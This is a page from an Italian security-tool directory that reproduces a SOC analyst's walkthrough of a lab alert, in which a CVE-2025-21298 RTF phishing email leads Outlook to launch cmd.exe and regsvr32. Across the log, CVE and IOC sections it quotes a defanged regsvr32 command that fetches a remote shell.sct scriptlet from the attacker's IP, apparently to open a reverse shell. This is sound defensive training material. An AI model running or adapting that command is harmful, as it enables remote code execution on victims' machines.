Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Rilevato sfruttamento RCE zero-click di Windows OLE (CVE-2025-21298) Walkthrough | Kitploit
Strumenti/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Analisi delle VulnerabilitàExploitMovimento LateraleReverse EngineeringInformatica ForensePhishingAnalisi MalwareCommand and ControlThreat Intelligence

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Apprendimento e Formazione
Risposta agli Incidenti
Sicurezza Email
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Rilevato sfruttamento RCE zero-click di Windows OLE (CVE-2025-21298) Walkthrough

Vedi RepositorySito web
2 mesi faNon ancora revisionato
Condividi

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Rilevata sfruttamento RCE Zero-Click OLE di Windows (CVE-2025-21298) Procedura dettagliata

phishing email

🔎 Indice dei contenuti
  1. Situazione
  2. Panoramica dell'avviso
  3. Strumenti utilizzati
  4. Analisi
    • Sicurezza email
    • Gestione log
      • Log del proxy
    • Sicurezza degli endpoint
      • Cronologia del terminale
      • Azione di rete
      • Processi
      • CVE-2025-21298
  5. Playbook
  6. Nota dell'analista
  7. Riferimenti

(Torna su)

Situazione

Uno dei nostri dipendenti, Austin, ha ricevuto un'email di phishing da un mittente sospetto e un avviso è stato attivato dopo che ha aperto l'email utilizzando Outlook il 04 febbraio 2025 alle 16:18. Il motivo dell'attivazione è stato "Allegato RTF dannoso identificato con pattern di exploit noto per CVE-2025-21298" .

(Torna su)

Panoramica dell'avviso

image

ID evento : 314

Ora evento : 04 feb 2025, 16:18 (penso fosse sbagliato)

Regola : SOC336 - Rilevata sfruttamento RCE Zero-Click OLE di Windows (CVE-2025-21298)

Livello : Analista della sicurezza

Indirizzo SMTP : 84.38.130.118

Indirizzo mittente : [email protected]

Indirizzo destinatario : [email protected]

Oggetto email : Important: Action Required for Upcoming Project Deadline

Allegato : mail.rtf

Hash allegato : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

Azione dispositivo : Consentita

Motivo dell'attivazione : Allegato RTF dannoso identificato con pattern di exploit noto per CVE-2025-21298.

(Torna su)

Strumenti utilizzati

  1. VirusTotal
  2. AbuseIPDB
  3. Gemini

(Torna su)

Analisi

Analizziamo i log di Sicurezza Email, Gestione Log e Sicurezza degli Endpoint per il triage dell'avviso.

Sicurezza Email

Screenshot 2026-05-27 151659

Ho cercato l'indirizzo del mittente projectmanagement@pm[.]me e ho fatto clic sull'email "Important: Action Required for Upcoming Project Deadline" inviata alle 05:12 dello stesso giorno, cosa che mi è sembrata strana perché i toni urgenti e parole come "Important" e "Action Required" mi hanno fatto pensare a un'email di phishing.



Screenshot 2026-05-27 175944

Ho cercato il dominio pm[.]me su VirusTotal e solo 1 vendor lo ha classificato come sospetto.



Screenshot 2026-05-27 151915

Tuttavia, quando ho cercato l'indirizzo SMTP 84[.]38[.]130[.]118, 7 vendor lo hanno segnalato come dannoso e malware, ed era correlato al server C2 SILVER.



Screenshot 2026-05-27 180753 Screenshot 2026-05-27 180810

84[.]38[.]130[.]118 è stato trovato anche nel database AbuseIPDB. Si trova a Riga, Riga, Lettonia, appartiene al dominio rixhost.lv ed è classificato come attacco DDoS, hacking e host compromesso.



Screenshot 2026-05-27 152243

Infine ho cercato l'hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 dell'allegato mail.rtf su VirusTotal e 29 vendor su 61 hanno segnalato l'allegato come dannoso. Appartiene alla famiglia di malware rtfmalformb ed è associato alla vulnerabilità CVE-2025-21298.

È stato confermato che un'email di phishing con un allegato dannoso è stata inviata ad Austin.

(Torna su)

Gestione Log

Verifichiamo se ci sono state attività sospette dopo le 05:12, quando Austin ha aperto l'email di phishing.

Log del proxy

Screenshot 2026-05-27 152515

Ho prima controllato il log del proxy e ho cercato l'indirizzo IP dannoso del mittente 84[.]38[.]130[.]118, scoprendo che alle 08:06 c'era una richiesta HTTP GET all'indirizzo IP dannoso con un URL hxxp://84[.]38[.]130[.]118/shell[.]sct avviata da cmd.exe, che scaricava un file scriptlet di Windows. Il codice di risposta era 200 OK, a indicare che il traffico in uscita era consentito e non bloccato dal firewall. Era insolito ricevere un file script che probabilmente conteneva una reverse shell.

(Torna su)

Sicurezza degli Endpoint

Cronologia del terminale

image Screenshot 2026-05-27 153447

Poiché il traffico in uscita verso l'indirizzo IP dannoso è stato avviato da cmd.exe, ho prima controllato la cronologia del terminale e ho scoperto che alle 08:06:08 era stato eseguito un comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" per generare regsvr32.exe e recuperare il file script dall'indirizzo IP dannoso tramite scrobj.dll.

  • regsvr32.exe: utilità da riga di comando per registrare e annullare la registrazione dei controlli OLE, come DLL e controlli ActiveX nel Registro di sistema di Windows
  • /s: regsvr32.exe è stato eseguito in background e in modalità silenziosa
  • /u: ha forzato Windows a non aggiungere questa chiave al Registro di sistema
  • /i: interfaccia
  • scrobj.dll: libreria runtime degli oggetti script che gestisce i file scriptlet

L'uso delle utilità integrate di Windows per recuperare lo script può lasciare tracce minime sul sistema, rendendo più difficile il processo di reverse engineering e analisi del malware!

(Torna su)

Azione di rete

Screenshot 2026-05-27 153102

È stato confermato che c'era una connessione all'IP dannoso 84[.]38[.]130[.]118 alle 08:06:42, dopo l'evento di esecuzione del comando.

(Torna su)

Processi

Allora perché cmd.exe è stato eseguito semplicemente facendo clic su un'email? Pur non avendo trovato prove del download dell'allegato dannoso mail.rtf da parte di Austin, ho controllato i log degli endpoint e cercato eventuali eventi intorno alle 08:06.

Screenshot 2026-05-27 153636

ID processo: 7023

Ora evento: 04 feb 2025 08:06:25

Riga di comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Processo padre: cmd.exe



Screenshot 2026-05-27 153616

OK, allora vediamo il processo padre cmd.exe

ID processo: 6784

Ora evento: 04 feb 2025 08:06:08

Riga di comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Processo padre: outlook.exe



Screenshot 2026-05-27 154136

E infine ho controllato il processo padre di outlook.exe

ID processo: 4820

Ora evento: 04 feb 2025 08:05:15

Riga di comando: "C:\Windows\System32\cmd.exe"

Processo padre: explorer.exe



Quindi possiamo concludere i processi dannosi in un albero:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Esecuzione dello script !

Tuttavia mi chiedevo ancora come i processi dannosi fossero stati avviati senza scaricare e aprire l'allegato dannoso, e come outlook.exe avesse generato il processo dannoso, finché non ho trovato informazioni su CVE-2025-21298.

(Torna su)

CVE-2025-21298

Screenshot 2026-05-27 201652

Secondo l'articolo di Offsec, a gennaio 2025 è stata scoperta una vulnerabilità critica zero-click OLE di Windows che consente l'esecuzione di codice in remoto (RCE) tramite email, con un punteggio CVSS di 9.8. Quando il destinatario designato apre o visualizza in anteprima l'email dannosa in Microsoft Outlook contenente un documento RTF dannoso con uno script incorporato , la vulnerabilità viene attivata, consentendo all'attaccante di eseguire codice arbitrario sul sistema interessato.

Ho fatto alcune ricerche su Windows OLE e sui processi di hijacking del documento RTF su Google e Gemini, collegandole alle mie conoscenze di reverse engineering:

  1. Quando si apre o si visualizza in anteprima il documento RTF, la funzione UtOlePresStmToContentsStm all'interno di ole32.dll utilizza un oggetto OLE puntato da pstmContents per leggere i dati dell'immagine in miniatura (OlePres) e riversarli nel file di dati effettivo (CONTENT).
  2. La funzione attiva immediatamente un errore di elaborazione imprevisto a causa del formato corrotto del file RTF dell'attaccante, causando l'eliminazione dell'oggetto OLE ma non del puntatore pstmContents.
  3. Il file RTF dannoso ha creato un oggetto OLE dannoso contenente il codice dannoso delle stesse dimensioni dell'oggetto OLE eliminato, riempiendo lo stesso spazio di memoria ancora puntato dal puntatore pstmContents.
  4. Dopo che Outlook ha terminato l'anteprima, esegue il falso processo di "pulizia" contenente il codice dannoso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" all'interno del falso oggetto OLE dannoso.
  5. Il sistema della vittima esegue il payload remoto e stabilisce una reverse shell automaticamente, senza alcun clic.

(Torna su)

Playbook

Screenshot 2026-05-28 144059 Screenshot 2026-05-28 144109 Screenshot 2026-05-28 144141 Screenshot 2026-05-28 144154 Screenshot 2026-05-28 144226 Screenshot 2026-05-28 144240

Non in quarantena

Screenshot 2026-05-28 144252

Dannoso

Screenshot 2026-05-28 144306

Accesso

Screenshot 2026-05-28 144316 Screenshot 2026-05-28 144343 Screenshot 2026-05-28 144730 Screenshot 2026-05-28 144804 Screenshot 2026-05-28 144844 Screenshot 2026-05-28 144940 Screenshot 2026-05-28 145001

(Torna su)

Nota dell'analista

Classificazione: Critica

Tipo: Malware

Orario dell'attività:

04 feb 2025, 05:12 (email di phishing ricevuta)

04 feb 2025, 08:05:15 - 04 feb 2025, 08:06:42 (email di phishing aperta e codice dannoso eseguito)

Entità coinvolte:

Indirizzo mittente: projectmanagement@pm[.]me

Indirizzo SMTP: 84[.]38[.]130[.]118

Indirizzo email destinatario: Austin@letsdefend[.]io

Indirizzo IP destinatario: 172[.]16[.]17[.]137

Hostname: Austin

Motivi del vero positivo:

Alle 04 feb 2025, 05:12, un'email sospetta con oggetto "Important: Action Required for Upcoming Project Deadline" è stata inviata da [email protected] (indirizzo IP: 84.38.130.118) a [email protected] (indirizzo IP: 172.16.17.137) con un allegato mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). I toni urgenti e le parole utilizzate nell'oggetto hanno lasciato intendere che si trattasse di un'email di phishing. Le fonti Threat Intel VirusTotal e AbuseIPDB hanno segnalato l'indirizzo IP del mittente, situato a Riga, Riga, Lettonia e appartenente al dominio rixhost.lv, e l'allegato come dannosi e malware.

Secondo i log del proxy, alle 08:06 c'era una richiesta HTTP GET all'indirizzo IP dannoso con un URL hxxp://84[.]38[.]130[.]118/shell[.]sct avviata da cmd.exe, che scaricava un file scriptlet di Windows. Il codice di risposta era 200 OK, a indicare che il traffico in uscita verso l'indirizzo IP dannoso era consentito e non bloccato dal firewall.

Secondo i log di Endpoint Security, il codice dannoso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) è stato avviato da cmd.exe (PID: 6784), generato da outlook.exe (PID: 4820).

Lo sfruttamento è stato causato da una vulnerabilità critica zero-click OLE di Windows (CVE-2025-21298) che consente l'esecuzione di codice in remoto (RCE) tramite email, con un punteggio CVSS di 9.8 a gennaio 2025. Quando il destinatario designato apre o visualizza in anteprima l'email dannosa in Microsoft Outlook contenente un documento RTF dannoso con uno script incorporato, la vulnerabilità viene attivata, consentendo all'attaccante di eseguire codice arbitrario sul sistema interessato, stabilendo potenzialmente una reverse shell verso il server C2.

Motivi dell'escalation:

Sebbene il traffico di rete C2 attivo post-sfruttamento non sia stato ancora osservato in modo definitivo, i log di endpoint security hanno confermato l'esecuzione di regsvr32.exe tramite scrobj.dll per recuperare il file scriptlet shell.sct. A causa del punteggio CVSS di 9.8 della CVE-2025-21298, è necessaria un'ulteriore indagine per verificare se sull'host sono presenti attività sospette come persistenza o esfiltrazione di dati.

Rimedi:

  • Disconnettere immediatamente l'host Austin dalla rete interna aziendale
  • Terminare il processo "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" e i relativi processi cmd.exe, outlook.exe
  • Bloccare il traffico in uscita verso 84[.]38[.]130[.]118
  • Inserire nella blacklist il dominio rixhost[.]lv
  • Inserire nella blacklist il mittente projectmanagement@pm[.]me nel server di posta
  • Applicare la patch per la vulnerabilità CVE-2025-21298
  • Reimpostare le credenziali di Austin
  • Eseguire l'analisi della memoria sull'host Austin per indagare sulle attività dannose come connessione C2, persistenza ed esfiltrazione di dati dopo l'esecuzione di shell.sct
  • Eseguire il reverse engineering su shell.sct
  • Eseguire l'analisi dell'email per indagare sull'IP di origine e sull'indirizzo di risposta nell'intestazione dell'email
  • Bloccare l'accesso a internet avviato da regsvr32.exe
  • Condurre una campagna di sensibilizzazione sul phishing per educare i dipendenti a non aprire email provenienti da mittenti sconosciuti o con toni o linguaggi urgenti

Indicatori di compromissione:

  • Indirizzo del mittente: projectmanagement@pm[.]me
  • Indirizzo IP del mittente: 84[.]38[.]130[.]118 Dominio del mittente: rixhost[.]lv
  • Email di phishing: "Important: Action Required for Upcoming Project Deadline"
  • Documento malevolo: mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
  • Albero dei processi malevoli: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
  • URL del secondo payload: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

(Torna su)

Riferimenti

Dettaglio CVE-2025-21298

CVE-2025-21298: Una vulnerabilità critica OLE di Windows zero-click

(Torna su)

Scarica lo strumento